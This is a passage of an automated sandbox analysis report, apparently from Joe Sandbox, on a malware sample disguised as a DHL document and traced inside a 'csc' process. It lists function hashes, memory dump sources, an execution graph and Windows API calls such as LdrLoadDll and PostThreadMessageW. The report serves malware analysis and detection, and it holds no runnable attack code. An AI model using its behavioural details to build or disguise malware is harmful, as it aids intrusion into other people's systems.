                                                                                  • Instruction Fuzzy Hash: E3E0DF2110F3D94FD712DA3988644487F50AF8724078981FEC0848F2A7D52D894BC702
                                                                                  Function 00007FFD9B8908CD Relevance: .0, Instructions: 26COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 91b9b19c0c13658cc189be6b37c24dc03e5195f6ea79bb036afaa123d94b97b8
                                                                                  • Instruction ID: a99c21b6b21d7d74fe35dc72932f61817155a7aae40380292dd6e8268a3a4922
                                                                                  • Opcode Fuzzy Hash: 91b9b19c0c13658cc189be6b37c24dc03e5195f6ea79bb036afaa123d94b97b8
                                                                                  • Instruction Fuzzy Hash: 2BE09B52B2E99D5FDAB5931C14751783E919F4DA1074600EFC089D75E3D9045D0843C2
                                                                                  Function 00007FFD9B891FF0 Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c175d528a3bff598fb0eb7889cc2ec0e25c839e434fa96f37859640eef63cb2e
                                                                                  • Instruction ID: 3b880b4b16a4ebd1a208f64fbf451d8ba342f2af182e2c9d6093201c42bbf771
                                                                                  • Opcode Fuzzy Hash: c175d528a3bff598fb0eb7889cc2ec0e25c839e434fa96f37859640eef63cb2e
                                                                                  • Instruction Fuzzy Hash: A0E01A2255F7CD1ED72367B458210957F34AF87104B0A41E7E4D88B4B3DA586A2CD362
                                                                                  Function 00007FFD9B8962EF Relevance: .0, Instructions: 24COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 96a45373e44a8c3b3c8af143a9c7802f6ef1e3a5e8dc76f9d75e4db82a4ef3eb
                                                                                  • Instruction ID: bf5ec66efbd3671b8f56bbbabd84432d80fc56d2bf36660ac1b76e37ba2f4776
                                                                                  • Opcode Fuzzy Hash: 96a45373e44a8c3b3c8af143a9c7802f6ef1e3a5e8dc76f9d75e4db82a4ef3eb
                                                                                  • Instruction Fuzzy Hash: 28E0C23591494C4FCB50FFA9DC014EB77E8FB88325F00067BE82CC31A1E634A6258B90
                                                                                  Function 00007FFD9B8A3BED Relevance: .0, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d010b4557bcd6d3305f452e33210ad43b6a99b31c0d062094239e68a605d9369
                                                                                  • Instruction ID: a08bd6cd79e77243b42ecc56be11fc7ba9fa6327a405cfb5427442eb7d538657
                                                                                  • Opcode Fuzzy Hash: d010b4557bcd6d3305f452e33210ad43b6a99b31c0d062094239e68a605d9369
                                                                                  • Instruction Fuzzy Hash: A6D05B31B1C7054FC61CDA68D8A243677E6FBD9704B51643DE4C3835A5CD20F901C681
                                                                                  Function 00007FFD9B895260 Relevance: .0, Instructions: 18COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d8b29c6c705358f5161ced89059ad2bb24b4ea392c7fa136f8eb45c905f706da
                                                                                  • Instruction ID: af949212c781998648f6ea18b34443376edaa1ec5baa171e5054e237abd8f58a
                                                                                  • Opcode Fuzzy Hash: d8b29c6c705358f5161ced89059ad2bb24b4ea392c7fa136f8eb45c905f706da
                                                                                  • Instruction Fuzzy Hash: 2FD02B3051B6484FD368DB20849141977D0FFCB200FC10469E44487358C13E85428701
                                                                                  Function 00007FFD9B8A3B3A Relevance: .0, Instructions: 16COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1c85d33673d63fa63a5c89f4211070ee72888e3ec74697334b365db00a89fa21
                                                                                  • Instruction ID: e2b0640a7c7b780e54caaf1343847bb6d1058ddcc50f03d1ab7fdd9394e43994
                                                                                  • Opcode Fuzzy Hash: 1c85d33673d63fa63a5c89f4211070ee72888e3ec74697334b365db00a89fa21
                                                                                  • Instruction Fuzzy Hash: 17D0A7B1609301DBE71577A4C84605CFB71EF86300B125379E04B56172DBB5E747DAC2
                                                                                  Function 00007FFD9B89BF80 Relevance: .0, Instructions: 14COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e54c5b3bbeb6c371ad1ffde078b2b0cf98e89f90ea7749bd0f58e27b538c0fe4
                                                                                  • Instruction ID: 67e4c31984005538e00091c4f42d411e6e70fcdd58a47c39494a87d00438a017
                                                                                  • Opcode Fuzzy Hash: e54c5b3bbeb6c371ad1ffde078b2b0cf98e89f90ea7749bd0f58e27b538c0fe4
                                                                                  • Instruction Fuzzy Hash: 2DC01230A1A50D8BC759777484550547152AF49308BD40CBCD00DC62D6DA3F9892C701
                                                                                  Function 00007FFD9B8A2A62 Relevance: .0, Instructions: 13COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e4c5615fa2b26f94a8df9a3462aaa45184ea36e93177dac4c4a01eb576d4f102
                                                                                  • Instruction ID: 8905282fb33f99596ccab8ab6c4d0d8aa56f6b81a5e97b3ac4a8c3f4143f421b
                                                                                  • Opcode Fuzzy Hash: e4c5615fa2b26f94a8df9a3462aaa45184ea36e93177dac4c4a01eb576d4f102
                                                                                  • Instruction Fuzzy Hash: 6AC08C12B6CA2912A63C39E8192B03D7E40CB99A20B8612BFEC06132A28C051E0200D6
                                                                                  Function 00007FFD9B8A3BC3 Relevance: .0, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: adb85a4fb69e791a0bd92603c997d868e70ecbb4318bef446e903051cbacaee7
                                                                                  • Instruction ID: 6c3383a5c5c2563bcb69629df604c3f32e8a37bdafea8d96d5fc37b2241e5d82
                                                                                  • Opcode Fuzzy Hash: adb85a4fb69e791a0bd92603c997d868e70ecbb4318bef446e903051cbacaee7
                                                                                  • Instruction Fuzzy Hash: 9ED023326197094BC228C750C4621D373D2FF48200F24D53BD0C7C3161CD20F5018740
                                                                                  Function 00007FFD9B8A3CA7 Relevance: .0, Instructions: 9COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1854368900.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd9b890000_dhl009544554961.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5b0c597e4e3a78b8198f725340626b00e96437e7dfb3d4f2f656b03dace7d535
                                                                                  • Instruction ID: 55b42d9a9c8277a38cad44fed349f3b805a4aecca395a17c639bd3280384a845
                                                                                  • Opcode Fuzzy Hash: 5b0c597e4e3a78b8198f725340626b00e96437e7dfb3d4f2f656b03dace7d535
                                                                                  • Instruction Fuzzy Hash: 1DC08C7062D38983C32CDB58C4A30BAB790AF84245F20383EF087850A2CA00BA46C942

                                                                                  Execution Graph

                                                                                  Execution Coverage:1.3%
                                                                                  Dynamic/Decrypted Code Coverage:5.4%
                                                                                  Signature Coverage:8.5%
                                                                                  Total number of Nodes:130
                                                                                  Total number of Limit Nodes:9
                                                                                  execution_graph 84905 42fa23 84906 42f993 84905->84906 84910 42f9f0 84906->84910 84911 42e813 84906->84911 84908 42f9cd 84914 42e733 84908->84914 84917 42c993 84911->84917 84913 42e82e 84913->84908 84920 42c9e3 84914->84920 84916 42e74c 84916->84910 84918 42c9b0 84917->84918 84919 42c9c1 RtlAllocateHeap 84918->84919 84919->84913 84921 42ca00 84920->84921 84922 42ca11 RtlFreeHeap 84921->84922 84922->84916 84923 424d83 84928 424d9c 84923->84928 84924 424e29 84925 424de4 84926 42e733 RtlFreeHeap 84925->84926 84927 424df4 84926->84927 84928->84924 84928->84925 84929 424e24 84928->84929 84930 42e733 RtlFreeHeap 84929->84930 84930->84924 85018 42bc53 85019 42bc70 85018->85019 85022 5782df0 LdrInitializeThunk 85019->85022 85020 42bc98 85022->85020 85023 4249f3 85024 424a0f 85023->85024 85025 424a37 85024->85025 85026 424a4b 85024->85026 85027 42c663 NtClose 85025->85027 85028 42c663 NtClose 85026->85028 85029 424a40 85027->85029 85030 424a54 85028->85030 85033 42e853 RtlAllocateHeap 85030->85033 85032 424a5f 85033->85032 85034 42f8f3 85035 42f903 85034->85035 85036 42f909 85034->85036 85037 42e813 RtlAllocateHeap 85036->85037 85038 42f92f 85037->85038 84931 41b2a3 84933 41b2e7 84931->84933 84932 41b308 84933->84932 84935 42c663 84933->84935 84936 42c67d 84935->84936 84937 42c68e NtClose 84936->84937 84937->84932 84938 413ca3 84940 413cc9 84938->84940 84939 413cf3 84940->84939 84942 413a23 LdrInitializeThunk 84940->84942 84942->84939 85039 418cf3 85040 418cfc 85039->85040 85044 418d46 85039->85044 85041 418cfe 85040->85041 85042 42c663 NtClose 85040->85042 85043 418d22 85042->85043 85045 413f93 85046 413f99 85045->85046 85051 417753 85046->85051 85048 413fcb 85049 413fff PostThreadMessageW 85048->85049 85050 414010 85048->85050 85049->85050 85052 417777 85051->85052 85053 41777e 85052->85053 85054 4177b3 LdrLoadDll 85052->85054 85053->85048 85054->85053 84943 401a88 84944 401ac0 84943->84944 84947 42fdc3 84944->84947 84950 42e303 84947->84950 84951 42e326 84950->84951 84962 4076a3 84951->84962 84953 42e33c 84954 401b99 84953->84954 84965 41b0b3 84953->84965 84956 42e35b 84957 42e370 84956->84957 84980 42ca33 84956->84980 84976 428323 84957->84976 84960 42e38a 84961 42ca33 ExitProcess 84960->84961 84961->84954 84983 416413 84962->84983 84964 4076b0 84964->84953 84966 41b0df 84965->84966 85001 41afa3 84966->85001 84969 41b140 84969->84956 84970 41b10c 84971 41b117 84970->84971 84972 42c663 NtClose 84970->84972 84971->84956 84972->84971 84973 41b124 84973->84969 84974 42c663 NtClose 84973->84974 84975 41b136 84974->84975 84975->84956 84977 428385 84976->84977 84979 428392 84977->84979 85012 4185c3 84977->85012 84979->84960 84981 42ca50 84980->84981 84982 42ca61 ExitProcess 84981->84982 84982->84957 84984 41642d 84983->84984 84986 416446 84984->84986 84987 42d0e3 84984->84987 84986->84964 84989 42d0fd 84987->84989 84988 42d12c 84988->84986 84989->84988 84994 42bca3 84989->84994 84992 42e733 RtlFreeHeap 84993 42d1a5 84992->84993 84993->84986 84995 42bcbd 84994->84995 84998 5782c0a 84995->84998 84996 42bce9 84996->84992 84999 5782c1f LdrInitializeThunk 84998->84999 85000 5782c11 84998->85000 84999->84996 85000->84996 85002 41afbd 85001->85002 85006 41b099 85001->85006 85007 42bd43 85002->85007 85005 42c663 NtClose 85005->85006 85006->84970 85006->84973 85008 42bd5d 85007->85008 85011 57835c0 LdrInitializeThunk 85008->85011 85009 41b08d 85009->85005 85011->85009 85013 4185ed 85012->85013 85014 42e733 RtlFreeHeap 85013->85014 85017 418afb 85013->85017 85015 418732 85014->85015 85016 42ca33 ExitProcess 85015->85016 85015->85017 85016->85017 85017->84979 85055 5782b60 LdrInitializeThunk 85056 413a7d 85057 413a25 85056->85057 85058 413a9f 85057->85058 85061 42c903 85057->85061 85062 42c91d 85061->85062 85065 5782c70 LdrInitializeThunk 85062->85065 85063 413a45 85065->85063

                                                                                  Executed Functions

                                                                                  Function 00417753 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 95 417753-41776f 96 417777-41777c 95->96 97 417772 call 42f433 95->97 98 417782-417790 call 42fa33 96->98 99 41777e-417781 96->99 97->96 102 4177a0-4177b1 call 42ddd3 98->102 103 417792-41779d call 42fcd3 98->103 108 4177b3-4177c7 LdrLoadDll 102->108 109 4177ca-4177cd 102->109 103->102 108->109
                                                                                  APIs
                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004177C5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
                                                                                  • Instruction ID: 882278f1722999b2ae2fee7c2c05bf526a7b08a6d75949410eb985d036f34d6b
                                                                                  • Opcode Fuzzy Hash: a024970c4561fa55472800a4d5645d921e68bffc055f8e666addb27ae271a54c
                                                                                  • Instruction Fuzzy Hash: A30175B5E0020DA7DF10DBE1DC42FDEB7789B54308F4041A6E91897280F634EB498B95
                                                                                  Function 0042C663 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 120 42c663-42c69c call 404a33 call 42d8c3 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C697
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction ID: 9a481ffe3b3909425eb855f21b4fa8ec41c3612d1979e7aa9e08aa26fcf307f8
                                                                                  • Opcode Fuzzy Hash: 93c36a3cf205b2cdfdda56150977d175043fba1793cb531f7e813bbf17b3f693
                                                                                  • Instruction Fuzzy Hash: 8BE046366146147BD620FA9AEC01F9BB7ACDFC5714F40441AFA08A7282C675BA058BA8
                                                                                  Function 05782DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 3e964b63873bca0a0a243bcf35be3914b0e8caed88b7f6f07867e53e30c8a637
                                                                                  • Instruction ID: 073580d74840e767f8004dafdbc54e2fe223c36cdbe51309d74ee21397e2cf1d
                                                                                  • Opcode Fuzzy Hash: 3e964b63873bca0a0a243bcf35be3914b0e8caed88b7f6f07867e53e30c8a637
                                                                                  • Instruction Fuzzy Hash: F190023220140413D515715855447070019C7E1241FD5C422A0428568D96568A52B137
                                                                                  Function 05782C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 5782c70-5782c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: c9a43e26a369ace493e1db6b28ff8e4f50f3330a5de9566b083f06933f2fbf6c
                                                                                  • Instruction ID: d9706051d3024a5801b6a978df75f324927c45db6abe231e5b06eab882adc6b8
                                                                                  • Opcode Fuzzy Hash: c9a43e26a369ace493e1db6b28ff8e4f50f3330a5de9566b083f06933f2fbf6c
                                                                                  • Instruction Fuzzy Hash: FE90023220148802D5147158944474A0015C7E1301F99C421A4428668D869589917137
                                                                                  Function 05782B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 134 5782b60-5782b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 96cca28f3187dc9ba1aa9f03f8cb212392e716dcd478e366130c81ec641bb47d
                                                                                  • Instruction ID: 0f934ed662655eb1c20ecf9c168c01886c1a4ac27d0af7f4c11f4bd189fe9eff
                                                                                  • Opcode Fuzzy Hash: 96cca28f3187dc9ba1aa9f03f8cb212392e716dcd478e366130c81ec641bb47d
                                                                                  • Instruction Fuzzy Hash: 5F90026220240003450971585454616401AC7F1201B95C031E10185A0DC5258991713B
                                                                                  Function 057835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, Offset: 05710000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5710000_csc.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 06ffd222e949f528f311fec13e4b3686d2039333cc93c62ea5e96795dae16ccd
                                                                                  • Instruction ID: d6aed502c4bf8b6a6c2f36565cdd132277d88ac7c1c5a165bf1b0bb6bd19b149
                                                                                  • Opcode Fuzzy Hash: 06ffd222e949f528f311fec13e4b3686d2039333cc93c62ea5e96795dae16ccd
                                                                                  • Instruction Fuzzy Hash: 5690023260550402D504715855547061015C7E1201FA5C421A0428578D87958A5175B7
                                                                                  Function 00413EDB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 96COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 2361o4QI$2361o4QI
                                                                                  • API String ID: 0-3806180685
                                                                                  • Opcode ID: 90ffc0043d586c91035da57b9ed244951c132cf4f048220e8a5cacc39bbf6315
                                                                                  • Instruction ID: e8fa03bdc57d78a45342910ef7c8a7e3514e68057cf4e77ef0c3907ee85d6fff
                                                                                  • Opcode Fuzzy Hash: 90ffc0043d586c91035da57b9ed244951c132cf4f048220e8a5cacc39bbf6315
                                                                                  • Instruction Fuzzy Hash: 122156B2E00119BEEB11DFA1CC81DEFBB7CEF81758B444159F140A7145D6398E0A8BE1
                                                                                  Function 00413F5D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 20 413f5d-413f65 21 413f67-413f87 20->21 22 413fab-413fb2 20->22 23 413fb8-413ffd call 417753 call 4049a3 call 424ea3 22->23 24 413fb3 call 42f1e3 22->24 31 41401d-414023 23->31 32 413fff-41400e PostThreadMessageW 23->32 24->23 32->31 33 414010-41401a 32->33 33->31
                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 2361o4QI$2361o4QI
                                                                                  • API String ID: 1836367815-3806180685
                                                                                  • Opcode ID: 2d3ccf23bd1e023b1fbabad5914fe7a0c26db93106ef8b02e9160a6dafcff11e
                                                                                  • Instruction ID: 8cbf97874721c207046154e43b058d99ff2e5aefe0913e325d3905e00d688be1
                                                                                  • Opcode Fuzzy Hash: 2d3ccf23bd1e023b1fbabad5914fe7a0c26db93106ef8b02e9160a6dafcff11e
                                                                                  • Instruction Fuzzy Hash: 33115072E01158BAEB119EA5DC82CFE7B7CEFC5758F41406AFA04B7100D6395E0647E5
                                                                                  Function 00413F88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 2361o4QI$2361o4QI
                                                                                  • API String ID: 1836367815-3806180685
                                                                                  • Opcode ID: 5d1477c64146abff2f10f711019a9778fb2fbeeaebe55ef00e05fe84ad753c4b
                                                                                  • Instruction ID: d18ac804c7d2dd6a07671b49327f6e5d33a89531f029e24374fb9e558da5f6d9
                                                                                  • Opcode Fuzzy Hash: 5d1477c64146abff2f10f711019a9778fb2fbeeaebe55ef00e05fe84ad753c4b
                                                                                  • Instruction Fuzzy Hash: 5111E9B1D0015CBAEB11AAA18C81CEF7B7CDF84758F448069FA14A7141D6785E0A8BE5
                                                                                  Function 00413F93 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(2361o4QI,00000111,00000000,00000000), ref: 0041400A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: 2361o4QI$2361o4QI
                                                                                  • API String ID: 1836367815-3806180685
                                                                                  • Opcode ID: 859fb626634821dde29a0609894101e9eef2ca991620197f7cb3afc08160fd5d
                                                                                  • Instruction ID: fd4e2a792fd360051d9b73504d4abf74b32c3d31853742531548d41b9085dbc7
                                                                                  • Opcode Fuzzy Hash: 859fb626634821dde29a0609894101e9eef2ca991620197f7cb3afc08160fd5d
                                                                                  • Instruction Fuzzy Hash: 5601DBB1D0011C7AEB10AAE19C81DEF7B7CDF84798F448069FA14B7141D6785E068BF5
                                                                                  Function 0042C9E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 115 42c9e3-42ca27 call 404a33 call 42d8c3 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5C468B5C,00000007,00000000,00000004,00000000,00416FD5,000000F4), ref: 0042CA22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
                                                                                  • Instruction ID: 49fd3192c8f19e4773edbc2c94e05b256c7b00cb1cb22bca70981a03036fcd12
                                                                                  • Opcode Fuzzy Hash: 5f68cb7d82b81062bbfcc78d4a111bf76dc2e6db85f06c16af699c288adbcfc5
                                                                                  • Instruction Fuzzy Hash: 9AE06DB16082047BC614EF59EC41E9B77ACDFC5710F004419FA08A7241D675BD108BB9
                                                                                  Function 0042C993 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 110 42c993-42c9d7 call 404a33 call 42d8c3 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E56E,?,?,00000000,?,0041E56E,?,?,?), ref: 0042C9D2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_400000_csc.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 1d9f2867c6562e32d1f2ed2233ac2ef1fb1a165fc89a58d93122af4896114f78
